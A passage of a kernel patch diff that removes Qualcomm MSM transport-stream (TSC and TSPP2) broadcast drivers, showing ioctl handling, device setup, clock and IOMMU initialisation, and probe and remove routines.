--		pr_err("%s: Unknown ioctl %i", __func__, cmd);
--	}
--
--err:
--	mutex_unlock(&tsc_mux->mutex);
--	return ret;
--}
--
--/**
-- * tsc_ci_ioctl() - Handle IOCTLs sent from user-space application.
-- *
-- * @flip:	The file pointer associated with the TSC CI device.
-- * @cmd:	The IOCTL code sent
-- * @arg:	The IOCTL argument (if the IOCTL receives an argument)
-- *
-- * Verify the validity of the IOCTL sent and handle it by updating the
-- * appropriate register or calling a function that handle the IOCTL operation.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static long tsc_ci_ioctl(struct file *filp,
--		unsigned int cmd,
--		unsigned long arg)
--{
--	int ret = 0;
--	struct tsc_ci_chdev *tsc_ci;
--	unsigned long flags;
--
--	tsc_ci = filp->private_data;
--	if (!tsc_ci)
--		return -EINVAL;
--
--	if (mutex_lock_interruptible(&tsc_ci->mutex))
--		return -ERESTARTSYS;
--
--	switch (cmd) {
--
--	case TSC_CAM_RESET:
--		ret = tsc_reset_cam();
--		break;
--	case TSC_CICAM_PERSONALITY_CHANGE:
--		ret = tsc_personality_change(arg);
--		break;
--	case TSC_GET_CARD_STATUS:
--		spin_lock_irqsave(&tsc_ci->spinlock, flags);
--		tsc_ci->card_status = tsc_device->hw_card_status;
--		ret = __put_user(tsc_ci->card_status,
--				(enum tsc_card_status __user *)arg);
--		spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--		break;
--	case TSC_READ_CAM_MEMORY:
--		ret = tsc_data_transaction(tsc_ci, MEMORY_TRANSACTION,
--				READ_TRANSACTION, SINGLE_BYTE_MODE, arg);
--		break;
--	case TSC_WRITE_CAM_MEMORY:
--		ret = tsc_data_transaction(tsc_ci, MEMORY_TRANSACTION,
--				WRITE_TRANSACTION, SINGLE_BYTE_MODE, arg);
--		break;
--	case TSC_READ_CAM_IO:
--		ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
--				READ_TRANSACTION, SINGLE_BYTE_MODE, arg);
--		break;
--	case TSC_WRITE_CAM_IO:
--		ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
--				WRITE_TRANSACTION, SINGLE_BYTE_MODE, arg);
--		break;
--	case TSC_READ_CAM_BUFFER:
--		ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
--				READ_TRANSACTION, BUFFER_MODE, arg);
--		break;
--	case TSC_WRITE_CAM_BUFFER:
--		ret = tsc_data_transaction(tsc_ci, IO_TRANSACTION,
--				WRITE_TRANSACTION, BUFFER_MODE, arg);
--		break;
--	default:
--		ret = -EINVAL;
--		pr_err("%s: Unknown ioctl %i\n", __func__, cmd);
--	}
--
--	mutex_unlock(&tsc_ci->mutex);
--	return ret;
--}
--
--/************************** Probe helper-functions **************************/
--/**
-- * tsc_init_char_driver() - Initialize a character driver.
-- *
-- * @pcdev:		A pointer to the cdev structure to initialize.
-- * @pfops:		A pointer to the file_operations for this device.
-- * @device_number:	A pointer that will store the device number.
-- * @device:		A pointer that will store the new device upon success.
-- * @name:		A string for the device's name.
-- *
-- * Create a new character device driver inside the TSC class. The new device
-- * is created under "/dev/<name>0".
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_init_char_driver(struct cdev *pcdev,
--		const struct file_operations *pfops,
--		dev_t *pdevice_number,
--		struct device *pdevice,
--		const char *name)
--{
--	int ret = 0;
--
--	/* Allocate device number for the char device driver */
--	ret = alloc_chrdev_region(pdevice_number, 0, 1, name);
--	if (ret) {
--		pr_err("%s: alloc_chrdev_region failed: %d\n",  name, ret);
--		goto err_devrgn;
--	}
--
--	/* initializing the char device structures with file operations */
--	cdev_init(pcdev, pfops);
--	pcdev->owner = THIS_MODULE;
--
--	/* adding the char device structures to the VFS */
--	ret = cdev_add(pcdev, *pdevice_number, 1);
--	if (ret != 0) {
--		pr_err("%s%d: cdev_add failed\n", name, MINOR(*pdevice_number));
--		goto err_cdev_add;
--	}
--
--	/* create the char devices under "/dev/" and register them to sysfs */
--	pdevice = device_create(tsc_class, NULL, pcdev->dev, NULL, "%s%d", name,
--			MINOR(*pdevice_number));
--	if (IS_ERR(pdevice)) {
--		pr_err("%s%d device_create failed\n", name,
--				MINOR(*pdevice_number));
--		ret = PTR_ERR(pdevice); /* PTR_ERR return -ENOMEM */
--		goto err_device_create;
--	}
--
--	return  ret;
--
--err_device_create:
--	cdev_del(pcdev);
--err_cdev_add:
--	unregister_chrdev_region(*pdevice_number, 1);
--err_devrgn:
--	return ret;
--}
--
--/**
-- * tsc_get_pinctrl() - Get the TSC pinctrl definitions.
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Get the pinctrl states' handles from the device tree. The function doesn't
-- * enforce wrong pinctrl definitions, i.e. it's the client's responsibility to
-- * define all the necessary states for the board being used.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_pinctrl(struct platform_device *pdev)
--{
--	struct pinctrl *pinctrl;
--
--	pinctrl = devm_pinctrl_get(&pdev->dev);
--	if (IS_ERR(pinctrl)) {
--		pr_err("%s: Unable to get pinctrl handle\n", __func__);
--		return -EINVAL;
--	}
--	tsc_device->pinctrl_info.pinctrl = pinctrl;
--
--	/* get all the states handles */
--	tsc_device->pinctrl_info.disable =
--			pinctrl_lookup_state(pinctrl, "disable");
--	tsc_device->pinctrl_info.ts0 =
--			pinctrl_lookup_state(pinctrl, "ts-in-0");
--	tsc_device->pinctrl_info.ts1 =
--			pinctrl_lookup_state(pinctrl, "ts-in-1");
--	tsc_device->pinctrl_info.dual_ts =
--			pinctrl_lookup_state(pinctrl, "dual-ts");
--	tsc_device->pinctrl_info.pc_card =
--			pinctrl_lookup_state(pinctrl, "pc-card");
--	tsc_device->pinctrl_info.ci_card =
--			pinctrl_lookup_state(pinctrl, "ci-card");
--	tsc_device->pinctrl_info.ci_plus =
--			pinctrl_lookup_state(pinctrl, "ci-plus");
--	tsc_device->pinctrl_info.ts0_pc_card =
--			pinctrl_lookup_state(pinctrl, "ts-in-0-pc-card");
--	tsc_device->pinctrl_info.ts0_ci_card =
--			pinctrl_lookup_state(pinctrl, "ts-in-0-ci-card");
--	tsc_device->pinctrl_info.ts0_ci_plus =
--			pinctrl_lookup_state(pinctrl, "ts-in-0-ci-plus");
--	tsc_device->pinctrl_info.ts1_pc_card =
--			pinctrl_lookup_state(pinctrl, "ts-in-1-pc-card");
--	tsc_device->pinctrl_info.ts1_ci_card =
--			pinctrl_lookup_state(pinctrl, "ts-in-1-ci-card");
--	tsc_device->pinctrl_info.ts1_ci_plus =
--			pinctrl_lookup_state(pinctrl, "ts-in-1-ci-plus");
--	tsc_device->pinctrl_info.dual_ts_pc_card =
--			pinctrl_lookup_state(pinctrl, "dual-ts-pc-card");
--	tsc_device->pinctrl_info.dual_ts_ci_card =
--			pinctrl_lookup_state(pinctrl, "dual-ts-ci-card");
--	tsc_device->pinctrl_info.dual_ts_ci_plus =
--			pinctrl_lookup_state(pinctrl, "dual-ts-ci-plus");
--
--	if (IS_ERR(tsc_device->pinctrl_info.disable)) {
--		pr_err("%s: Unable to get pinctrl disable state handle\n",
--				__func__);
--		return -EINVAL;
--	}
--
--	/* Basic checks to inquire what pinctrl states are available */
--	if (IS_ERR(tsc_device->pinctrl_info.ts0))
--		tsc_device->pinctrl_info.is_ts0 = false;
--	else
--		tsc_device->pinctrl_info.is_ts0 = true;
--
--	if (IS_ERR(tsc_device->pinctrl_info.ts1))
--		tsc_device->pinctrl_info.is_ts1 = false;
--	else
--		tsc_device->pinctrl_info.is_ts1 = true;
--
--	if (IS_ERR(tsc_device->pinctrl_info.pc_card) ||
--			IS_ERR(tsc_device->pinctrl_info.ci_card) ||
--			IS_ERR(tsc_device->pinctrl_info.ci_plus))
--		tsc_device->pinctrl_info.is_pcmcia = false;
--	else
--		tsc_device->pinctrl_info.is_pcmcia = true;
--
--	return 0;
--}
--
--/**
-- * tsc_get_regulator_bus() - Get the TSC regulator and register the bus client.
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_regulator_bus(struct platform_device *pdev)
--{
--	struct msm_bus_scale_pdata *tsc_bus_pdata = NULL;
--
--	/* Reading the GDSC info */
--	tsc_device->gdsc = devm_regulator_get(&pdev->dev, "vdd");
--	if (IS_ERR(tsc_device->gdsc)) {
--		dev_err(&pdev->dev, "%s: Failed to get vdd power regulator\n",
--				__func__);
--		return PTR_ERR(tsc_device->gdsc);
--	}
--
--	/* Reading the bus platform data */
--	tsc_bus_pdata = msm_bus_cl_get_pdata(pdev);
--	if (tsc_bus_pdata == NULL) {
--		dev_err(&pdev->dev, "%s: Could not find the bus property. Continue anyway...\n",
--				__func__);
--	}
--
--	/* Register the bus client */
--	if (tsc_bus_pdata) {
--		tsc_device->bus_client =
--				msm_bus_scale_register_client(tsc_bus_pdata);
--		if (!tsc_device->bus_client) {
--			dev_err(&pdev->dev, "%s: Unable to register bus client\n",
--					__func__);
--			goto err;
--		}
--	}
--
--	return 0;
--err:
--	devm_regulator_put(tsc_device->gdsc);
--	return -EINVAL;
--}
--
--/**
-- * tsc_get_irqs() - Get the TSC IRQ numbers and map the cam irq.
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Read the irq numbers from the platform device information.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_irqs(struct platform_device *pdev)
--{
--	int irq;
--
--	irq = platform_get_irq_byname(pdev, "cam-cmd");
--	if (irq > 0) {
--		tsc_device->cam_cmd_irq = irq;
--	} else {
--		dev_err(&pdev->dev, "%s: Failed to get CAM_CMD IRQ = %d",
--				__func__, irq);
--		goto err;
--	}
--
--	irq = platform_get_irq_byname(pdev, "card-detect");
--	if (irq > 0) {
--		tsc_device->card_detection_irq = irq;
--	} else {
--		dev_err(&pdev->dev, "%s: Failed to get CARD_DETECT IRQ = %d",
--				__func__, irq);
--		goto err;
--	}
--
--	return 0;
--err:
--	tsc_device->cam_cmd_irq = 0;
--	tsc_device->card_detection_irq = 0;
--
--	return -EINVAL;
--}
--
--/**
-- * tsc_map_io_memory() - Map memory resources to kernel space.
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_map_io_memory(struct platform_device *pdev)
--{
--	struct resource *registers_mem;
--
--	/* Reading memory resources */
--	registers_mem = platform_get_resource_byname(pdev, IORESOURCE_MEM,
--			"tsc-base");
--	if (!registers_mem) {
--		dev_err(&pdev->dev, "%s: Missing tsc-base MEM resource",
--				__func__);
--		return -EINVAL;
--	}
--
--	tsc_device->base = ioremap(registers_mem->start,
--			resource_size(registers_mem));
--	if (!tsc_device->base) {
--		dev_err(&pdev->dev, "%s: ioremap failed", __func__);
--		return -ENXIO;
--	}
--
--	return 0;
--}
--
--/**
-- * tsc_clocks_put() - Put the clocks
-- */
--static void tsc_clocks_put(void)
--{
--	if (tsc_device->ahb_clk)
--		clk_put(tsc_device->ahb_clk);
--	if (tsc_device->ci_clk)
--		clk_put(tsc_device->ci_clk);
--	if (tsc_device->ser_clk)
--		clk_put(tsc_device->ser_clk);
--	if (tsc_device->par_clk)
--		clk_put(tsc_device->par_clk);
--	if (tsc_device->cicam_ts_clk)
--		clk_put(tsc_device->cicam_ts_clk);
--	if (tsc_device->tspp2_core_clk)
--		clk_put(tsc_device->tspp2_core_clk);
--	if (tsc_device->vbif_tspp2_clk)
--		clk_put(tsc_device->vbif_tspp2_clk);
--	if (tsc_device->vbif_ahb_clk)
--		clk_put(tsc_device->vbif_ahb_clk);
--	if (tsc_device->vbif_axi_clk)
--		clk_put(tsc_device->vbif_axi_clk);
--
--	tsc_device->ahb_clk = NULL;
--	tsc_device->ci_clk = NULL;
--	tsc_device->ser_clk = NULL;
--	tsc_device->par_clk = NULL;
--	tsc_device->cicam_ts_clk = NULL;
--	tsc_device->tspp2_core_clk = NULL;
--	tsc_device->vbif_tspp2_clk = NULL;
--	tsc_device->vbif_ahb_clk = NULL;
--	tsc_device->vbif_axi_clk = NULL;
--}
--
--/**
-- * tsc_clocks_get() - Get the TSC clocks
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_clocks_get(struct platform_device *pdev)
--{
--	int ret = 0;
--
--	tsc_device->ahb_clk = clk_get(&pdev->dev, "bcc_tsc_ahb_clk");
--	if (IS_ERR(tsc_device->ahb_clk)) {
--		pr_err("%s: Failed to get bcc_tsc_ahb_clk\n", __func__);
--		ret = PTR_ERR(tsc_device->ahb_clk);
--		goto ahb_err;
--	}
--
--	tsc_device->ci_clk = clk_get(&pdev->dev, "bcc_tsc_ci_clk");
--	if (IS_ERR(tsc_device->ci_clk)) {
--		pr_err("%s: Failed to get bcc_tsc_ci_clk\n", __func__);
--		ret = PTR_ERR(tsc_device->ci_clk);
--		goto ci_err;
--	}
--
--	tsc_device->ser_clk = clk_get(&pdev->dev, "bcc_tsc_ser_clk");
--	if (IS_ERR(tsc_device->ser_clk)) {
--		pr_err("%s: Failed to get bcc_tsc_ser_clk\n", __func__);
--		ret = PTR_ERR(tsc_device->ser_clk);
--		goto ser_err;
--	}
--
--	tsc_device->par_clk = clk_get(&pdev->dev, "bcc_tsc_par_clk");
--	if (IS_ERR(tsc_device->par_clk)) {
--		pr_err("%s: Failed to get bcc_tsc_par_clk", __func__);
--		ret = PTR_ERR(tsc_device->par_clk);
--		goto par_err;
--	}
--
--	tsc_device->cicam_ts_clk = clk_get(&pdev->dev, "bcc_tsc_cicam_ts_clk");
--	if (IS_ERR(tsc_device->cicam_ts_clk)) {
--		pr_err("%s: Failed to get bcc_tsc_cicam_ts_clk", __func__);
--		ret = PTR_ERR(tsc_device->cicam_ts_clk);
--		goto cicam_err;
--	}
--
--	tsc_device->tspp2_core_clk = clk_get(&pdev->dev, "bcc_tspp2_core_clk");
--	if (IS_ERR(tsc_device->tspp2_core_clk)) {
--		pr_err("%s: Failed to get bcc_tspp2_core_clk", __func__);
--		ret = PTR_ERR(tsc_device->tspp2_core_clk);
--		goto tspp2_err;
--	}
--
--	tsc_device->vbif_tspp2_clk = clk_get(&pdev->dev, "bcc_vbif_tspp2_clk");
--	if (IS_ERR(tsc_device->vbif_tspp2_clk)) {
--		pr_err("%s: Failed to get bcc_vbif_tspp2_clk", __func__);
--		ret = PTR_ERR(tsc_device->vbif_tspp2_clk);
--		goto vbif_tspp2_err;
--	}
--
--	tsc_device->vbif_ahb_clk = clk_get(&pdev->dev, "iface_vbif_clk");
--	if (IS_ERR(tsc_device->vbif_ahb_clk)) {
--		pr_err("%s: Failed to get bcc_vbif_ahb_clk", __func__);
--		ret = PTR_ERR(tsc_device->vbif_ahb_clk);
--		goto vbif_ahb_err;
--	}
--
--	tsc_device->vbif_axi_clk = clk_get(&pdev->dev, "vbif_core_clk");
--	if (IS_ERR(tsc_device->vbif_axi_clk)) {
--		pr_err("%s: Failed to get bcc_vbif_axi_clk", __func__);
--		ret = PTR_ERR(tsc_device->vbif_axi_clk);
--		goto vbif_axi_err;
--	}
--
--	return ret;
--
--vbif_axi_err:
--	tsc_device->vbif_axi_clk = NULL;
--	clk_put(tsc_device->vbif_ahb_clk);
--vbif_ahb_err:
--	tsc_device->vbif_ahb_clk = NULL;
--	clk_put(tsc_device->vbif_tspp2_clk);
--vbif_tspp2_err:
--	tsc_device->vbif_tspp2_clk = NULL;
--	clk_put(tsc_device->tspp2_core_clk);
--tspp2_err:
--	tsc_device->tspp2_core_clk = NULL;
--	clk_put(tsc_device->cicam_ts_clk);
--cicam_err:
--	tsc_device->cicam_ts_clk = NULL;
--	clk_put(tsc_device->par_clk);
--par_err:
--	tsc_device->par_clk = NULL;
--	clk_put(tsc_device->ser_clk);
--ser_err:
--	tsc_device->ser_clk = NULL;
--	clk_put(tsc_device->ci_clk);
--ci_err:
--	tsc_device->ci_clk = NULL;
--	clk_put(tsc_device->ahb_clk);
--ahb_err:
--	tsc_device->ahb_clk = NULL;
--	return ret;
--}
--
--/**
-- * tsc_free_iommu_info() - Free IOMMU information.
-- */
--static void tsc_free_iommu_info(void)
--{
--	if (tsc_device->iommu_info.group)  {
--		iommu_group_put(tsc_device->iommu_info.group);
--		tsc_device->iommu_info.group = NULL;
--	}
--
--	if (tsc_device->iommu_info.ion_client) {
--		ion_client_destroy(tsc_device->iommu_info.ion_client);
--		tsc_device->iommu_info.ion_client = NULL;
--	}
--
--	tsc_device->iommu_info.domain = NULL;
--	tsc_device->iommu_info.domain_num = -1;
--	tsc_device->iommu_info.partition_num = -1;
--}
--
--/**
-- * tsc_get_iommu_info() - Get IOMMU information.
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_get_iommu_info(struct platform_device *pdev)
--{
--	int ret = 0;
--
--	/* Create a new ION client used by tsc ci to allocate memory */
--	tsc_device->iommu_info.ion_client = msm_ion_client_create("tsc_client");
--	if (IS_ERR_OR_NULL(tsc_device->iommu_info.ion_client)) {
--		pr_err("%s: error in ion_client_create", __func__);
--		ret = PTR_ERR(tsc_device->iommu_info.ion_client);
--		if (!ret)
--			ret = -ENOMEM;
--		tsc_device->iommu_info.ion_client = NULL;
--		goto err_client;
--	}
--
--	/* Find the iommu group by the name obtained from the device tree */
--	tsc_device->iommu_info.group =
--		iommu_group_find(tsc_device->iommu_info.iommu_group_name);
--	if (!tsc_device->iommu_info.group) {
--		pr_err("%s: error in iommu_group_find", __func__);
--		ret = -EINVAL;
--		goto err_group;
--	}
--
--	/* Get the domain associated with the iommu group */
--	tsc_device->iommu_info.domain =
--			iommu_group_get_iommudata(tsc_device->iommu_info.group);
--	if (IS_ERR_OR_NULL(tsc_device->iommu_info.domain)) {
--		pr_err("%s: iommu_group_get_iommudata failed", __func__);
--		ret = -EINVAL;
--		goto err_domain;
--	}
--
--	/* Get the domain number */
--	tsc_device->iommu_info.domain_num =
--			msm_find_domain_no(tsc_device->iommu_info.domain);
--
--	return ret;
--
--err_domain:
--	iommu_group_put(tsc_device->iommu_info.group);
--	tsc_device->iommu_info.group = NULL;
--err_group:
--	ion_client_destroy(tsc_device->iommu_info.ion_client);
--	tsc_device->iommu_info.ion_client = NULL;
--err_client:
--	return ret;
--}
--
--/**
-- * tsc_parse_dt() - Parse device-tree data and save it.
-- *
-- * @pdev:	A pointer to the TSC platform device.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_parse_dt(struct platform_device *pdev)
--{
--	struct device_node *node = pdev->dev.of_node;
--	struct device_node *iommu_pnode;
--	int ret;
--
--	/* Check that power regulator property exist  */
--	if (!of_get_property(node, "vdd-supply", NULL)) {
--		dev_err(&pdev->dev, "%s: Could not find vdd-supply property\n",
--				__func__);
--		return -EINVAL;
--	}
--
--	/* Reading IOMMU group label by obtaining the group's phandle */
--	iommu_pnode = of_parse_phandle(node, "qcom,iommu-group", 0);
--	if (!iommu_pnode) {
--		dev_err(&pdev->dev, "%s: Couldn't find iommu-group property\n",
--				__func__);
--		return -EINVAL;
--	}
--	ret = of_property_read_string(iommu_pnode, "label",
--			&tsc_device->iommu_info.iommu_group_name);
--	of_node_put(iommu_pnode);
--	if (ret) {
--		dev_err(&pdev->dev, "%s: Couldn't find label property of the IOMMU group, err=%d\n",
--				__func__, ret);
--		return -EINVAL;
--	}
--
--	/* Reading IOMMU partition */
--	ret = of_property_read_u32(node, "qcom,iommu-partition",
--			&tsc_device->iommu_info.partition_num);
--	if (ret) {
--		dev_err(&pdev->dev, "%s: Couldn't find iommu-partition property, err=%d\n",
--				__func__, ret);
--		return -EINVAL;
--	}
--
--	/* Reading reset cam gpio */
--	tsc_device->reset_cam_gpio = of_get_named_gpio(node,
--			"qcom,tsc-reset-cam-gpio", 0);
--	if (tsc_device->reset_cam_gpio < 0) {
--		dev_err(&pdev->dev, "%s: Couldn't find qcom,tsc-reset-cam-gpio property\n",
--				__func__);
--		return -EINVAL;
--	}
--
--	return 0;
--}
--
--/* TSC Mux file operations */
--static const struct file_operations tsc_mux_fops = {
--		.owner   = THIS_MODULE,
--		.open    = tsc_mux_open,
--		.poll    = tsc_mux_poll,
--		.release = tsc_mux_release,
--		.unlocked_ioctl   = tsc_mux_ioctl,
--};
--
--/* TSC CI file operations */
--static const struct file_operations tsc_ci_fops = {
--		.owner   = THIS_MODULE,
--		.open    = tsc_ci_open,
--		.poll    = tsc_ci_poll,
--		.release = tsc_ci_release,
--		.unlocked_ioctl   = tsc_ci_ioctl,
--};
--
--
--/************************ Device driver probe function ************************/
--static int msm_tsc_probe(struct platform_device *pdev)
--{
--	int ret;
--
--	tsc_device = kzalloc(sizeof(struct tsc_device), GFP_KERNEL);
--	if (!tsc_device) {
--		pr_err("%s: Unable to allocate memory for struct\n", __func__);
--		return -ENOMEM;
--	}
--
--	/* get information from device tree */
--	if (pdev->dev.of_node) {
--		ret = tsc_parse_dt(pdev);
--		if (ret != 0) {
--			pr_err("%s: devicetree data not available", __func__);
--			ret =  -EINVAL;
--			goto err_dt;
--		}
--	} else { /* else - devicetree is not found */
--		pr_err("%s: devicetree data is missing", __func__);
--		ret =  -EINVAL;
--		goto err_dt;
--	}
--
--	/* set up references */
--	tsc_device->pdev = pdev;
--	platform_set_drvdata(pdev, tsc_device);
--
--	/* init iommu client, group and domain */
--	if (!tsc_iommu_bypass) {
--		ret = tsc_get_iommu_info(pdev);
--		if (ret != 0)
--			return ret;
--	}
--
--	/* Map clocks */
--	ret = tsc_clocks_get(pdev);
--	if (ret != 0)
--		goto err_clocks_get;
--
--	/* map registers memory */
--	ret = tsc_map_io_memory(pdev);
--	if (ret != 0)
--		goto err_map_io;
--
--	/* map irqs */
--	ret = tsc_get_irqs(pdev);
--	if (ret != 0)
--		goto err_map_irqs;
--
--	/* get regulators and bus */
--	ret = tsc_get_regulator_bus(pdev);
--	if (ret != 0)
--		goto err_get_regulator_bus;
--
--	/* get pinctrl */
--	ret = tsc_get_pinctrl(pdev);
--	if (ret != 0)
--		goto err_pinctrl;
--
--	/* creating the tsc device's class */
--	tsc_class = class_create(THIS_MODULE, "tsc");
--	if (IS_ERR(tsc_class)) {
--		ret = PTR_ERR(tsc_class);
--		pr_err("%s: Error creating class: %d\n", __func__, ret);
--		goto err_class;
--	}
--
--	/* Initialize and register mux char device driver */
--	ret = tsc_init_char_driver(&tsc_device->mux_chdev.cdev, &tsc_mux_fops,
--			&tsc_device->mux_device_number, tsc_device->device_mux,
--			"tsc_mux");
--	if (ret != 0)
--		goto err_chdev_mux;
--
--	/* Initialize and register ci char device drivers */
--	ret = tsc_init_char_driver(&tsc_device->ci_chdev.cdev, &tsc_ci_fops,
--			&tsc_device->ci_device_number, tsc_device->device_ci,
--			"tsc_ci");
--	if (ret != 0)
--		goto err_chdev_ci;
--
--	/* Init char device counters */
--	tsc_device->num_device_open = 0;
--	tsc_device->num_mux_opened = 0;
--	tsc_device->num_ci_opened = 0;
--
--	/* Init char device mutexes and completion structs */
--	mutex_init(&tsc_device->mux_chdev.mutex);
--	mutex_init(&tsc_device->ci_chdev.mutex);
--	mutex_init(&tsc_device->mutex);
--	init_completion(&tsc_device->ci_chdev.transaction_complete);
--	init_completion(&tsc_device->ci_chdev.transaction_finish);
--
--	/* Init debugfs support */
--	tsc_debugfs_init();
--
--	return ret;
--
--err_chdev_ci:
--	device_destroy(tsc_class, tsc_device->mux_chdev.cdev.dev);
--	cdev_del(&tsc_device->mux_chdev.cdev);
--err_chdev_mux:
--	class_destroy(tsc_class);
--err_class:
--err_pinctrl:
--	if (tsc_device->bus_client)
--		msm_bus_scale_unregister_client(tsc_device->bus_client);
--
--	devm_regulator_put(tsc_device->gdsc);
--err_get_regulator_bus:
--err_map_irqs:
--	iounmap(tsc_device->base);
--err_map_io:
--	tsc_clocks_put();
--err_clocks_get:
--	tsc_free_iommu_info();
--err_dt:
--	kfree(tsc_device);
--
--	return ret;
--}
--
--/*********************** Device driver remove function ***********************/
--static int msm_tsc_remove(struct platform_device *pdev)
--{
--	/* Removing debugfs support */
--	tsc_debugfs_exit();
--
--	/* Destroying the char device mutexes */
--	mutex_destroy(&tsc_device->mux_chdev.mutex);
--	mutex_destroy(&tsc_device->ci_chdev.mutex);
--
--	/* unregistering and deleting the tsc-ci char device driver*/
--	device_destroy(tsc_class, tsc_device->ci_chdev.cdev.dev);
--	cdev_del(&tsc_device->ci_chdev.cdev);
--
--	/* unregistering and deleting the tsc-mux char device driver*/
--	device_destroy(tsc_class, tsc_device->mux_chdev.cdev.dev);
--	cdev_del(&tsc_device->mux_chdev.cdev);
--
--	/* Unregistering the char devices */
--	unregister_chrdev_region(tsc_device->ci_device_number, 1);
--	unregister_chrdev_region(tsc_device->mux_device_number, 1);
--
--	/* Removing the tsc class*/
--	class_destroy(tsc_class);
--
--	/* Unregister the bus client and the regulator */
--	if (tsc_device->bus_client)
--		msm_bus_scale_unregister_client(tsc_device->bus_client);
--
--	devm_regulator_put(tsc_device->gdsc);
--
--	/* Unmapping the io memory */
--	iounmap(tsc_device->base);
--
--	/* Releasing the clocks */
--	tsc_clocks_put();
--
--	/* Releasing the iommu info */
--	if (!tsc_iommu_bypass)
--		tsc_free_iommu_info();
--
--	/* Releasing the memory allocated for the TSC device struct */
--	kfree(tsc_device);
--
--	return 0;
--}
--
--/*********************** Platform driver information ***********************/
--static struct of_device_id msm_match_table[] = {
--		{.compatible = "qcom,msm-tsc"},
--		{}
--};
--
--static struct platform_driver msm_tsc_driver = {
--		.probe          = msm_tsc_probe,
--		.remove         = msm_tsc_remove,
--		.driver         = {
--		.name   = "msm_tsc",
--		.of_match_table = msm_match_table,
--	},
--};
--
--/**
-- * tsc_init() - TSC driver module init function.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int __init tsc_init(void)
--{
--	int ret = 0;
--
--	/* register the driver, and check hardware */
--	ret = platform_driver_register(&msm_tsc_driver);
--	if (ret) {
--		pr_err("%s: platform_driver_register failed: %d\n", __func__,
--				ret);
--		return ret;
--	}
--
--	return ret;
--}
--
--/**
-- * tsc_exit() - TSC driver module exit function.
-- */
--static void __exit tsc_exit(void)
--{
--	platform_driver_unregister(&msm_tsc_driver);
--}
--
--module_init(tsc_init);
--module_exit(tsc_exit);
--
--MODULE_DESCRIPTION("TSC platform device and two char devs: mux and ci");
--MODULE_LICENSE("GPL v2");
-diff --git a/drivers/media/platform/msm/broadcast/tspp2.c b/drivers/media/platform/msm/broadcast/tspp2.c
-deleted file mode 100644
-index 1f51dca..0000000
---- a/drivers/media/platform/msm/broadcast/tspp2.c
-+++ /dev/null
-@@ -1,8578 +0,0 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 and
-- * only version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-- * GNU General Public License for more details.
-- */
--
--#include <linux/module.h>
--#include <linux/clk.h>
--#include <linux/io.h>
--#include <linux/dma-mapping.h>
--#include <linux/debugfs.h>
--#include <linux/device.h>
--#include <linux/pm_runtime.h>
--#include <linux/pm_wakeup.h>
--#include <linux/platform_device.h>
--#include <linux/msm_ion.h>
--#include <linux/slab.h>
--#include <linux/delay.h>
--#include <linux/of.h>
--#include <linux/list.h>
--#include <linux/mutex.h>
--#include <linux/workqueue.h>
--#include <linux/iommu.h>
--#include <linux/qcom_iommu.h>
--#include <linux/msm_iommu_domains.h>
--#include <linux/msm-bus.h>
--#include <mach/msm_tspp2.h>
--#include <linux/clk/msm-clk.h>
--
--#define TSPP2_MODULUS_OP(val, mod)	((val) & ((mod) - 1))
--
--/* General definitions. Note we're reserving one batch. */
--#define TSPP2_NUM_ALL_INPUTS	(TSPP2_NUM_TSIF_INPUTS + TSPP2_NUM_MEM_INPUTS)
--#define TSPP2_NUM_CONTEXTS		128
--#define TSPP2_NUM_AVAIL_CONTEXTS	127
--#define TSPP2_NUM_HW_FILTERS		128
--#define TSPP2_NUM_BATCHES		15
--#define TSPP2_FILTERS_PER_BATCH		8
--#define TSPP2_NUM_AVAIL_FILTERS	(TSPP2_NUM_HW_FILTERS - TSPP2_FILTERS_PER_BATCH)
--#define TSPP2_NUM_KEYTABLES		32
--#define TSPP2_TSIF_DEF_TIME_LIMIT   15000 /* Number of tsif-ref-clock ticks */
--
--#define TSPP2_NUM_EVENT_WORK_ELEMENTS	256
--
--/*
-- * Based on the hardware programming guide, HW requires we wait for up to 2ms
-- * before closing the pipes used by the filter.
-- * This is required to avoid unexpected pipe reset interrupts.
-- */
--#define TSPP2_HW_DELAY_USEC		2000
--
--/*
-- * Default source configuration:
-- * Sync byte 0x47, check sync byte,
-- * Do not monitor scrambling bits,
-- * Discard packets with invalid AF,
-- * Do not assume duplicates,
-- * Do not ignore discontinuity indicator,
-- * Check continuity of TS packets.
-- */
--#define TSPP2_DEFAULT_SRC_CONFIG	0x47801E49
--
--/*
-- * Default memory source configuration:
-- * Use 16 batches,
-- * Attach last batch to each memory source.
-- */
--#define TSPP2_DEFAULT_MEM_SRC_CONFIG	0x80000010
--
--/* Bypass VBIF/IOMMU for debug and bring-up purposes */
--static int tspp2_iommu_bypass;
--module_param(tspp2_iommu_bypass, int, S_IRUGO);
--
--/* Enable Invalid Adaptation Field control bits event */
--static int tspp2_en_invalid_af_ctrl;
--module_param(tspp2_en_invalid_af_ctrl, int, S_IRUGO | S_IWUSR);
--
--/* Enable Invalid Adaptation Field length event */
--static int tspp2_en_invalid_af_length;
--module_param(tspp2_en_invalid_af_length, int, S_IRUGO | S_IWUSR);
--
